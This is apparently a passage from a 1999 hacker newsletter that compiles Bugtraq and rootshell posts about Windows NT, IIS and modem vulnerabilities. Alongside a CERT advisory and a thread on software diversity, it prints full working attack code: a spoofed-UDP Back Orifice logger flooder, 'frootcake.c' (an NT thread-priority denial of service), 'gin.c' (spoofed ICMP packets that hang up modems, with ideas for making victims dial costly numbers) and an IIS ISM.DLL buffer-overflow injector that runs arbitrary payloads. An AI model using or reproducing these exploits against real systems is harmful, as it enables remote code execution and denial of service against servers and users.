} printf ("done.. sending shellcode.."); fflush (stdout); net_write (sd, "%s\n\n", front); printf ("done.. closing fd!\n"); close (sd); printf ("%s\n", front); exit (EXIT_SUCCESS); } int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip, unsigned short int sourceport, int sec) { int n, len, error, flags; int fd; struct timeval tv; fd_set rset, wset; /* first allocate a socket */ cs->sin_family = AF_INET; cs->sin_port = htons (port); fd = socket (cs->sin_family, SOCK_STREAM, 0); if (fd == -1) return (-1); if (!(cs->sin_addr.s_addr = net_resolve (server))) { close (fd); return (-1); } flags = fcntl (fd, F_GETFL, 0); if (flags == -1) { close (fd); return (-1); } n = fcntl (fd, F_SETFL, flags | O_NONBLOCK); if (n == -1) { close (fd); return (-1); } error = 0; n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in)); if (n < 0) { if (errno != EINPROGRESS) { close (fd); return (-1); } } if (n == 0) goto done; FD_ZERO(&rset); FD_ZERO(&wset); FD_SET(fd, &rset); FD_SET(fd, &wset); tv.tv_sec = sec; tv.tv_usec = 0; n = select(fd + 1, &rset, &wset, NULL, &tv); if (n == 0) { close(fd); errno = ETIMEDOUT; return (-1); } if (n == -1) return (-1); if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) { if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) { len = sizeof(error); if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) { errno = ETIMEDOUT; return (-1); } if (error == 0) { goto done; } else { errno = error; return (-1); } } } else return (-1); done: n = fcntl(fd, F_SETFL, flags); if (n == -1) return (-1); return (fd); } unsigned long int net_resolve (char *host) { long i; struct hostent *he; i = inet_addr(host); if (i == -1) { he = gethostbyname(host); if (he == NULL) { return (0); } else { return (*(unsigned long *) he->h_addr); } } return (i); } void net_write (int fd, const char *str, ...) { char tmp[8192]; va_list vl; int i; va_start(vl, str); memset(tmp, 0, sizeof(tmp)); i = vsnprintf(tmp, sizeof(tmp), str, vl); va_end(vl); send(fd, tmp, i, 0); return; } -------------------------------------------------------------------------------- Date: Wed, 16 Jun 1999 19:09:42 GMT From: Ethan Benatan To: BUGTRAQ@netspace.org Subject: Re: IIS Remote Exploit (injection code) >>> "Greg" == Greg Hoglund writes: Greg> I read yesturday on eEye.com that they had discovered a buffer Greg> overflow in IIS..... Greg> Lastly, I would simply like to point out that monoculture Greg> installations are very dangerous. It's a concept from Greg> agribusiness.. if you have all one crop, and a virus comes Greg> along that can kill that crop, your out of business. Very true, and this is a terrifically important message to get out. Not to be pedantic but actually it is a concept from ecology: the "business", as Greg puts it, can be any system. Diversity makes for resilience, and vice versa. Okay aleph, it's not a bug but it is a way we should be thinking. Greg> With Greg> almost ALL of the IIS servers on the net being vulnerable to Greg> this exploit, we also have a monoculture. And, it's not just Greg> IIS. The backbone of the Internet is built on common router Greg> technology (such as cisco IOS). If a serious exploit comes Greg> along for the IOS kernel, can you imagine the darkness that Greg> will fall? Ethan ethan+@pitt.edu -------------------------------------------------------------------------------- Date: Wed, 16 Jun 1999 16:40:25 -0400 From: Dug Song To: BUGTRAQ@netspace.org Subject: Re: IIS Remote Exploit (injection code) On Wed, 16 Jun 1999, Ethan Benatan wrote: > Very true, and this is a terrifically important message to get out... > Diversity makes for resilience, and vice versa. see stephanie forrest's work on computer immunology: http://www.cs.unm.edu/~immsec/ and to a lesser extent, random "canary" values in StackGuard: http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ and the introduction of randomness to defeat race attacks, predictable sequence number attacks, etc. in OpenBSD: http://www.openbsd.org/crypto.html -d. --- http://www.monkey.org/~dugsong/ -------------------------------------------------------------------------------- Date: Wed, 16 Jun 1999 15:03:52 -0700 From: Crispin Cowan To: BUGTRAQ@netspace.org Subject: Diversity (was: IIS Remote Exploit (injection code)) Dug Song wrote: > On Wed, 16 Jun 1999, Ethan Benatan wrote: > > > Very true, and this is a terrifically important message to get out... > > Diversity makes for resilience, and vice versa. > > see stephanie forrest's work on computer immunology: > > http://www.cs.unm.edu/~immsec/ > > and to a lesser extent, random "canary" values in StackGuard: > > http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ StackGuard came about because we investigated the approach of using diversity to resist attack, and found it to be VERY limited in effectiveness. The core problem is that when you change things, you create incompatabilities for friend and foe alike, i.e. a diversity hack strong enough to defeat an attacker is also likely to break a lot of YOUR applications. This occurs because: * The diversity hack must preserve many invariants that are necessary to keep legitimate applications running, and these invariants are often subtle and unknown, e.g. Linux applications that only work on Red Hat systems. * Simultaneously, the diversity hack must BREAK the invariants that the attacker depends on, and these invariants are mostly unknown. If you knew what they were, you would have fixed the bug :-) Having discovered that diversity is hard to make both effective and practical, we moved on to study what we call "restrictions." A restriction prohibits certain classes of behavior that are always known to be bad, e.g. changing the return address of an active function, which is what stack smashes try to do, and what StackGuard prevents. It is our conjecture that for every diversity hack that one can propose, there is a restriction hack that is easier to deploy and more effective. This has been true in practice as we try to construct security-enhancing tools. Full papers on these ideas can be found here: http://www.cse.ogi.edu/DISC/projects/immunix/survivability.html Crispin ----- Crispin Cowan, Research Assistant Professor of Computer Science, OGI NEW: Protect Your Linux Host with StackGuard'd Programs :FREE http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ Microsoft: Putting the "lame" in "layman" -------------------------------------------------------------------------------- Date: Wed, 16 Jun 1999 16:30:12 -0400 From: CERT Advisory Reply-To: cert-advisory-request@cert.org To: cert-advisory@coal.cert.org Subject: CERT Advisory CA-99.07 - IIS Buffer Overflow -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-99-07 IIS Buffer Overflow Originally released: June 16, 1999 Source: CERT/CC Systems Affected * Machines running Microsoft Internet Information Server 4.0. I. Description A buffer overflow vulnerability affecting Microsoft Internet Information Server 4.0 has been discovered in the ISM.DLL library. According to Microsoft, ISM.DLL is the "filter DLL that processes .HTR files. HTR files enable remote administration of user passwords." A tool to exploit this vulnerability has been publicly released. II. Impact This vulnerability allows remote intruders to execute arbitrary code with the privileges of the IIS server. Additionally, intruders can use this vulnerability to crash vulnerable IIS processes. III. Solution Microsoft has released Microsoft Security Bulletin MS99-019 describing a workaround to this problem. Additionally, Microsoft is working on a patch to fix this problem; information regarding this patch will be available in the Microsoft Security Bulletin. We encourage you to read this bulletin, available from http://www.microsoft.com/security/bulletins/ms99-019.asp We will update this advisory as more information becomes available. Please check the CERT/CC web site for the most current revision. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html. ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key. If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/. To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message. Copyright 1999 Carnegie Mellon University. Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html. * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. Revision History June 16, 1999: Initial release -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCUAwUBN2gDVnVP+x0t4w7BAQE5EwP1GxYDqIPNlqd1SzIRlgS/k8ir75NIWEly +N4QqpEjR/1xWzBiro2Z94ZXD8GTugkkjxsyQgOdzMe3iWj8apbrokA6aRfOJ+4B lth2LgpurSU8TDmuo+miSBnS7joWaLzD6q/IAfYFb5wE890Lrale27uJVq+adqB+ +U3S1Pga2Q== =iOIZ -----END PGP SIGNATURE----- -------------------------------------------------------------------------------- Date: Mon, 21 Jun 1999 12:23:27 +0300 From: Mikko Hypponen To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: Alert: Microsoft Security Bulletin (MS99-019) - IIS Fix Available Russ: >Microsoft have released a patch for IIS 4.0 which addresses the issues >uncovered by eEye. Also, if you want to monitor who's running IISHACK in your organisation, we've added detection of this tool (as a trojan horse) into latest updates for F-Secure Anti-Virus. This detects the original IISHACK.EXE as released by eEye with the name "Trojan.IIS_Hack". For more information, see our Virus News Updates at: http://www.datafellows.com/news/vir-news/ -- Mikko Hermanni Hyppönen, Mikko.Hypponen@DataFellows.com Manager, Anti-Virus Research, Data Fellows Corp. Integrated Solutions for Enterprise Security Tel +358 9 8599 0513 - fax +358 9 8599 0713 http://www.DataFellows.com/staff/hermanni/ @HWA 112.0 BO server flooder sends random spoofed udp's to the attacker ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /**************************************/ /* Back orifice server flooder */ /* Send random spoofed udp bo packet */ /* to some lame logger */ /* This code crash with just 5 packet */ /* the old fakebo and the real one */ /* The lasted just need more packet */ /* to crash ;) */ /* Another code from Bong */ /* bong26@hotmail.com */ /**************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min)) #define err(x) { fprintf(stderr, x); exit(1); } int i; char data[] = { 0xCE, 0x63, 0xD1, 0xD2, 0x16, 0xE7, 0x13, 0xCF, 0x3D, 0xA5, 0xA5, 0x86, 0xB2, 0x75, 0x4B, 0x99, 0x9F, 0x18, 0x58, 0x86, 0x89, 0x99}; void brek(int no){ printf("\nStoped\n%d packet sended!\n",i); exit(1); } int sendpkt_udp (sin, sock, data, len, src, dst, sport, dport) struct sockaddr_in *sin; unsigned short int sock, len, sport, dport; unsigned long int src, dst; char *data; { struct iphdr ip; struct udphdr udp; static char packet[8192]; char crashme[500]; ip.ihl = 5; ip.version = 4; ip.tos = rand () % 100;; ip.tot_len = htons (28 + len); ip.id = htons (31337 + (rand () % 100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_UDP; ip.check = 0; ip.saddr = src; ip.daddr = dst; udp.source = htons (sport); udp.dest = htons (dport); udp.len = htons (8 + len); udp.check = (short) 0; memcpy (packet, (char *) &ip, sizeof (ip)); memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp)); memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, len); memcpy (packet + sizeof (ip) + sizeof (udp) + len, crashme, 500); return sendto (sock, packet, sizeof (ip) + sizeof (udp) + len + 500, 0, (struct sockaddr *) sin, sizeof (struct sockaddr_in)); } unsigned int lookup (char *host) { unsigned int addr; struct hostent *he; addr = inet_addr (host); if (addr == -1){ he = gethostbyname (host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));} return (addr); } void main (int argc, char **argv) { unsigned int src,dst; char *tmpsrc; struct sockaddr_in sin; struct hostent *hep; long wait=25000; int sock,dstP,srcP=113,nb=1,mod,a,b,c,d; signal(SIGINT, brek); if (argc < 3){ printf("\nBo logger flooder by Bong\n"); printf ("Usage: %s [source] [numb]\n",argv[0]); printf("Mode 1: one source\n"); printf("Mode 2: random source\n\n"); exit(1);} if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err("Unable to open raw socket.\n"); mod=atoi(argv[1]); if (mod==1){ if (argc < 4) printf("Need at least 3 argument"); if (!(src = lookup (argv[2]))) err ("Unable to lookup address.\n"); if (!(dst = lookup (argv[3]))) err ("Unable to lookup address.\n"); tmpsrc=(argv[3]); if(argv[4]){ nb = atoi(argv[4]);} }else{ if (!(dst = lookup (argv[2]))) err("Unable to lookup address..\n"); tmpsrc=(argv[2]); if(argv[3]){ nb = atoi(argv[3]);} } sin.sin_family = AF_INET; sin.sin_port = 31337; sin.sin_addr.s_addr = dst; printf("Flood %s with mode %d and %d packet\n",tmpsrc,mod,nb); for(i=0; i < nb; i++){ if (mod==2){ srandom((time(0)+i)); srcP = getrandom(1,1500)+1000; a = getrandom(0, 255); b = getrandom(0, 255); c = getrandom(0, 255); d = getrandom(0, 255); sprintf(tmpsrc, "%i.%i.%i.%i", a, b, c, d); hep=gethostbyname(tmpsrc); src= *(unsigned long *)hep->h_addr;} if ((sendpkt_udp (&sin, sock, &data,sizeof(data),src,dst,srcP,31337)) == -1) err ("Error sending the UDP packet.\n");} printf("\n%d Packet sended!\n",i); } @HWA 113.0 frootcake.c revisited ~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 9 Jun 1999 23:46:05 +1000 From: kiva To: BUGTRAQ@netspace.org Subject: ordinary users bringing NT to its knees [repost] [Aleph, sorry about my original post - I pasted the wrong code! oops! :) ] Hi, sorry if problems like this are known, but I thought I'd post this just incase... I was curious at how well NT could handle *lots* of threads, so I wrote the following. It basically locks up the system with an inability to kill the process because (I) never get the task manager up. Pretty bad since an ordinary user can run it :/ my system: 2xPPro with NT4 (SP5), 128megs RAM. cheers ---------------------------- /* * frootcake.c * kiva@wookey.org * * this tests NT at coping with *really dodgy* code... * it totally brings my SMP box to being unusable (SP5) */ #include #include void poobah(); DWORD WINAPI thread_func (LPVOID lpv) { DWORD id; HANDLE h; BOOL success = 1; h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id); while (success){ switch (GetThreadPriority (h)){ case THREAD_PRIORITY_ABOVE_NORMAL: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_BELOW_NORMAL: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_HIGHEST: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_IDLE: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_LOWEST: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_NORMAL: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; } } poobah(); return 0; } void poobah() { DWORD id; HANDLE h; h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id); SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); poobah(); } int main () { printf ("frootcake - kiva@wookey.org\n"); poobah(); return 0; } /* eof */ -------------------------------------------------------------------------------- Date: Thu, 10 Jun 1999 12:34:23 -0700 From: David Schwartz To: BUGTRAQ@netspace.org Subject: Re: ordinary users bringing NT to its knees [repost] This is just an exploit for the 'neverending quantum' bug that's been known for ages. See http://www.sysinternals.com/tips.htm#NEQuantum It has nothing to do with the number of threads running (except that you need at least one per CPU). The bug occurs when a thread changes its priority. NT changes the thread's priority, but also gives it a new execution quantum. By repeating this process, a single thread can monopolize a CPU. DS -------------------------------------------------------------------------------- Never-ending Quantum? In NT, as with most time-sharing operating systems, threads run in turns called quantums. Normally, a thread executes until its quantum runs out. The next time it is scheduled it starts with a full quantum. However, in NT a thread also gets its quantum refreshed every time its thread or process priority is set. This means that a thread can reset its quantum by calling SetThreadPriority (without changing its priority) before its turn runs out. If it continues to do this it will effectively have an infinite quantum. Why does NT do this? Its not clear, but it appears to be a bug. @HWA 114.0 gin.c spoofs packets containing + + + ATH0 which causes some modems to hang up ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [ www.rootshell.com ] From jpester@engr.csulb.edu Sun Jun 6 22:09:57 1999 Date: Sun, 6 Jun 1999 22:05:49 -0700 (PDT) From: Jonathan Pester To: submission@rootshell.com Subject: 'new' DoS Hey kids, amputee here... Pointed out to me recently was a 'new' DoS if you can call it that..I'm sure lots of people have thought of doing this, but I haven't seen or heard of anythingl ike it yet. So here goes, as usual a code to test the exploit is attached below, now for a long boring technical explanation (script kiddiez, skip to the code now) [ explanation ] The way the exploit works is it hides escape/control sequences in a ICMP echo_request packet (it contains the string +++ATH0) the +++ sends the modem into escape mode (and if the guard time on the modem is set ridiculously low) it will go into command mode and you can issue it an ATH0 to hang up. It works on the reply, because it receives the echo_request packet, then duplicates the packet with a new timestamp and checksum, dest/source hosts and returns it to the sender, when it returns it the string is sent to the modem, and thus hanging it up. There are a few conditions that must be met for it to work (if you dont want to be vulnerable to this, fix these!) 1) target computer must not filter ICMP echo_request and must know how to reply to one if it gets one 2) target computer must be using a modem (you can't hangup DS3s, although i suppose you could hangup telco return connections..if you can find one) 3) target computer must have a vulnerable modem (i.e. guard time is set ridiculously low) 4) you have to be able to send spoofed packets (or..if you can't i guess you can use your own address, but then the target knows where it came from) In my experimenting, I have also devised various fun ways to use this program other than just nuking your buddy off IRC. In theory..it is possible to modify the program to do fun stuff like make the target call some number after it hangs up (i.e. +++ATH0,,,DT5551212) should make the modem hangup, pause for 6 seconds then call 5551212..this is fun for obvious reasons. Then the next variation I came up with is a smurf like implementation in which you could make a script to DoS a class C subnet, with the number of your least favorite company, since most company's have 800 numbers, not only does this cause chaos to the phone bank, but also costs ~$.30 per call...but i don't condone any of those ideas of course, this is just for experimental/educational purposes only, if you fix your modems, none of this is possible, so get off your ass and fix it. script kiddiez: here is your code... --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- /* * gin.c [ fuck the soda nukers, im no kiddie ] * * [ http://www.rootshell.com/ ] * * [ sarcastic program description here ] * pff, hey kiddiez! this program sends mad packets to some foo from * every broadcast address on earth, mad leet yo... * (you really wanna know what it does? LEARN TO CODE! and stop being a * gayass fuckin script kiddie) * * Author: amputee (amputee@fack.net) * Compiled on: * Linux 2.2.9 i586 (GNU/Debian 2.2 development version) * egcs-2.91.66 * * [ time for greets, and fuck yous ] * * [ Greets (in no logical order) ] * scummy, fobia (come back foo), ignitor, stalin, bigs, rotafer, statix * silencers, blackang|, porp, the rest of #shutdown, soldier, klepto, * drastic, the other #havok OGs and #eof, governor, cry0mance, gixerboy, * protocol-, broknbonz, abalution, and anyone else i forgot that isn't * in my fuck you list... * * [ Fuck yous ] * spawn66x1 <--hahah, nucleoid (aka dynamo, emulate, microbe, immune, * logistic ) you annoy me you stupid fuck, all authorities at PVPHS * (my old high school) i wish cancer upon you. madcrew, you are gay * and, anyone else who isnt in my greets list =] * * [ disclaimer ] * i really dont see how i could get in trouble for this stupid program * its really not that great, but the legal system is gay these days, * so...this program is for educational purposes only, and the author * holds no liability for the actions of the people that use it, that * includes dwarfs, cyclopses, albinos, and anyone else who may happen * to use my program. dont modify or rip on this shit, suck me * -- amp */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define VERSION "1.2-05.05" //fixed old compiler compatibility problems #define FRIEND "foo" void usage( char *name ); void banner( void ); char *get_progname( char *fullname ); void done( int foo ); void gin( int port, struct sockaddr_in sin, struct sockaddr_in din ); unsigned short in_chksum( u_short *ipbuf, int iplen ); int main( int argc, char **argv ) { struct hostent *sourceinfo, *destinfo; struct sockaddr_in sin, din; int sockfd, numpackets, i; char *target, *source; banner(); ( argc < 4 ) ? usage( get_progname( argv[0] ) ) : ( void )NULL; source = argv[1]; target = argv[2]; numpackets = ( atoi( argv[3] ) ); signal( SIGINT, done ); if( ( sourceinfo = gethostbyname( source ) ) == NULL ) { printf( "cannot resolve source host!\n" ); exit( -1 ); } memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr, sourceinfo->h_length ); sin.sin_family = AF_INET; if( ( destinfo = gethostbyname( target ) ) == NULL ) { printf( "cannot resolve destination host!\n" ); exit( -1 ); } memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr, destinfo->h_length ); din.sin_family = AF_INET; if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 ) { printf( "Cannot get raw socket, you must be root!\n" ); exit( -1 ); } printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) ); printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) ); printf( "Number\t\t\t: %d\n", numpackets ); printf( "Have some gin sucka" ); for( i = 0; i < numpackets; i++ ) gin( sockfd, sin, din ); printf( "\n\nsent %d packet%c...done\n", numpackets, ( numpackets > 1 ) ? 's' : ( char )NULL ); return 0; } void usage( char *name ) { printf( "usage: %s \n[ http://www.rootshell.com/ ] \n\n", name ); exit( 0 ); } void banner( void ) { printf( "\ngin [ v%s ] /\\ by amputee\n", VERSION ); printf( "compiled for: %s\n\n", FRIEND ); } char *get_progname( char *fullname ) { char *retval = strrchr( fullname, '/' ); return retval ? ++retval : fullname; } void done( int foo ) { puts( "Exiting...\n" ); exit( 1 ); } void gin( int port, struct sockaddr_in sin, struct sockaddr_in din ) { char *ginstring = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r"; char *packet; int total; struct iphdr *ip; struct icmphdr *icmp; size_t msglen = sizeof( ginstring ), iphlen = sizeof( struct iphdr ); size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct timeval ); int len = strlen( ginstring ); packet = ( char * )malloc( iphlen + icplen + len ); ip = ( struct iphdr * )packet; icmp = ( struct icmphdr * )( packet + iphlen ); ( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen )], ( struct timezone * )NULL ); memcpy( ( packet + iphlen + icplen + timlen ), ginstring, ( len - 4 ) ); ip->tot_len = htons( iphlen + icplen + ( len - 4 ) + timlen ); ip->version = 4; ip->ihl = 5; ip->tos = 0; ip->ttl = 255; ip->protocol = IPPROTO_ICMP; ip->saddr = sin.sin_addr.s_addr; ip->daddr = din.sin_addr.s_addr; ip->check = in_chksum( ( u_short * )ip, iphlen ); icmp->type = ICMP_ECHO; icmp->code = 0; icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + ( len - 4 ) ) ); total = ( iphlen + icplen + timlen + len + 16 ); sendto( port, packet, total, 0, ( struct sockaddr * )&din, sizeof( struct sockaddr ) ); free( packet ); } // stolen from smurf unsigned short in_chksum( u_short *ipbuf, int iplen ) { register int nleft = iplen; register int sum = 0; u_short answer = 0; while( nleft > 1 ) { sum += *ipbuf++; nleft -= 2; } if( nleft == 1 ) { *( u_char * )( &answer ) = *( u_char * )ipbuf; sum += answer; } sum = ( sum >> 16 ) + ( sum + 0xffff ); sum += ( sum >> 16 ); answer = ~sum; return( answer ); } --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- Also note: some machines seg fault when they run this, and setting the environment variable MALLOC_CHECK_ to 1 seems to solve this. And..this code will probably come out all offset and break when you try to compile it...so just fix it, it compiles fine (i use g++ -O3 -o gin gin.c). amp @HWA 115.0 IIS Remote Exploit (injection code) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 16 Jun 1999 08:58:05 -0700 From: Greg Hoglund To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: IIS Remote Exploit (injection code) I read yesturday on eEye.com that they had discovered a buffer overflow in IIS. I could not resist writing an exploit. I did not have time to design a really cool payload for this exploit, so I simply wrote the injection code. However, this is meaningful for several reasons. Attached is the injection code. The exploit will deliver any payload of your choosing. Your payload will be executed. This empowers you to create a "collection" of payloads that are not dependant upon the injection vector in any way. This decoupling is important for military needs, where a single injection vector needs to work, but the "warhead" may be different depending on the targets characterization. The exploit was fairly simple to build. In short, I read on eEye.com that they had overflowed IIS with something like a ~3000 character URL. Within minutes I had caused IIS to crash with EIP under my control. I used a special pattern in the buffer (see code) to make it easy for me to identify where EIP was being popped from. The pattern also made it easy to determine where I was jumping around. Use the tekneek Danielson. ;-) So, I controlled EIP, but I needed to get back to my stack segment, of course. This is old school, and I really lucked out. Pushed down two levels on the stack was an address for my buffer. I couldn't have asked for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could return to. It had two pop's followed by a return. This made my injection vector return to the value that was stored two layers down on the stack. Bam, I was in my buffer. So, I landed in a weird place, had to add a near jump to get to somewhere more useful.. nothing special, and here we are with about 2K of payload space. If you don't supply any mobile code to be run, the injection vector will supply some for you. The default payload in simply a couple of no-ops followed by a debug breakpoint (interrupt 3)... It's easy to play with if you want to build your own payloads.. just keep a debugger attached to inetinfo.exe on the target machine. Lastly, I would simply like to point out that monoculture installations are very dangerous. It's a concept from agribusiness.. if you have all one crop, and a virus comes along that can kill that crop, your out of business. With almost ALL of the IIS servers on the net being vulnerable to this exploit, we also have a monoculture. And, it's not just IIS. The backbone of the Internet is built on common router technology (such as cisco IOS). If a serious exploit comes along for the IOS kernel, can you imagine the darkness that will fall? <--- snip // IIS Injector for NT // written by Greg Hoglund // http://www.rootkit.com // // If you would like to deliver a payload, it must be stored in a binary file. // This injector decouples the payload from the injection code allowing you to // create a numnber of different attack payloads. This code could be used, for // example, by a military that needs to attack IIS servers, and has characterized // the eligible hosts. The proper attack can be chosen depending on needs. Since // the payload is so large with this injection vector, many options are available. // First and foremost, virii can delivered with ease. The payload is also plenty // large enough to remotely download and install a back door program. // Considering the monoculture of NT IIS servers out on the 'Net, this represents a // very serious security problem. #include #include #include void main(int argc, char **argv) { SOCKET s = 0; WSADATA wsaData; if(argc < 2) { fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \ "http://www.rootkit.com\nUsage: %s \n", argv[0]); exit(0); } WSAStartup(MAKEWORD(2,0), &wsaData); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(INVALID_SOCKET != s) { SOCKADDR_IN anAddr; anAddr.sin_family = AF_INET; anAddr.sin_port = htons(80); anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]); if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr))) { static char theSploit[4096]; // fill pattern char kick = 'z'; //0x7a char place = 'A'; // my uber sweet pattern gener@t0r for(int i=0;i<4096;i+=4) { theSploit[i] = kick; theSploit[i+1] = place; theSploit[i+2] = place + 1; theSploit[i+3] = place + 2; if(++place == 'Y') // beyond 'XYZ' { place = 'A'; if(--kick < 'a') kick = 'a'; } } _snprintf(theSploit, 5, "get /"); _snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0"); // after crash, looks like inetinfo.exe is jumping to the address // stored @ location 'GHtG' (0x47744847) // cross reference back to the buffer pattern, looks like we need // to store our EIP into theSploit[598] // magic eip into NTDLL.DLL theSploit[598] = (char)0xF0; theSploit[599] = (char)0x8C; theSploit[600] = (char)0xF8; theSploit[601] = (char)0x77; // code I want to execute // will jump foward over the // embedded eip, taking us // directly to the payload theSploit[594] = (char)0x90; //nop theSploit[595] = (char)0xEB; //jmp theSploit[596] = (char)0x35; // theSploit[597] = (char)0x90; //nop // the payload. This code is executed remotely. // if no payload is supplied on stdin, then this default // payload is used. int 3 is the debug interrupt and // will cause your debugger to "breakpoint" gracefully. // upon examiniation you will find that you are sitting // directly in this code-payload. if(argc < 3) { theSploit[650] = (char) 0x90; //nop theSploit[651] = (char) 0x90; //nop theSploit[652] = (char) 0x90; //nop theSploit[653] = (char) 0x90; //nop theSploit[654] = (char) 0xCC; //int 3 theSploit[655] = (char) 0xCC; //int 3 theSploit[656] = (char) 0xCC; //int 3 theSploit[657] = (char) 0xCC; //int 3 theSploit[658] = (char) 0x90; //nop theSploit[659] = (char) 0x90; //nop theSploit[660] = (char) 0x90; //nop theSploit[661] = (char) 0x90; //nop } else { // send the user-supplied payload from // a file. Yes, that's a 2K buffer for // mobile code. Yes, that's big. FILE *in_file; in_file = fopen(argv[2], "rb"); if(in_file) { int offset = 650; while( (!feof(in_file)) && (offset < 3000)) { theSploit[offset++] = fgetc(in_file); } fclose(in_file); } } send(s, theSploit, strlen(theSploit), 0); } closesocket(s); } } @HWA 116.0 ActiveX security revisited ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 9 Jun 1999 12:22:00 +0100 >From: "Steve Loughran" Subject: ActiveX Security Revisited The latest Microsoft security bulletin http://www.microsoft.com/security/bulletins/ms99-018.asp ) includes two Internet Explorer patches. The first is a classic stack overrun -a web page can supply an icon for use when adding to the favourite links list, and a malformed icon could overrun the stack and so execute arbitrary code. The second fault is a security hole in ActiveX control, and is a simple instantiation of the problem covered in RISKS-18.85 and RISKS-18.86, namely than code signing is a far less safe method of software distribution than a 'sandbox' for untrusted code. It so happens that one of the ActiveX controls dating from IE3 can be used to test for the presence or absence of files on a hard disk, and while no access to the contents is granted, it can be used to build up a picture of what applications are installed. My demonstration page http://www.iseran.com/ActiveX/filesearch.html ) shows a naive script looking for common windows files in well known places -it could just as easily look for well known applications as a preamble to an application specific attack. The insecure 'Preloader' control has some interesting properties. Firstly, it is signed by Microsoft, showing that even the inventors of ActiveX and the entire Win32 API did not test their controls rigorously enough. Secondly, some distributions of Internet Explorer may have automatically installed the control, in which case the control download or signature verification process is bypassed. It so happens that the default security settings of the Outlook and Outlook Express e-mail messages, which means anyone could send a web page referencing the control to any known recipient and stand a moderate chance of being able to enumerate some disk files, possibly with no visible notification to the recipient. This strikes me as a more serious problem than the risk incurred by looking at random web pages, as it enables attacks targeted at individual recipients. Within four weeks of notifying Microsoft via their security e-mail alias the company announced the problem, and withdrew the control from their own web site, which seems a reasonable response time. Of course, if ActiveX had included a mechanism whereby the signer of a control could retroactively revoke that control then it would have been trivial to 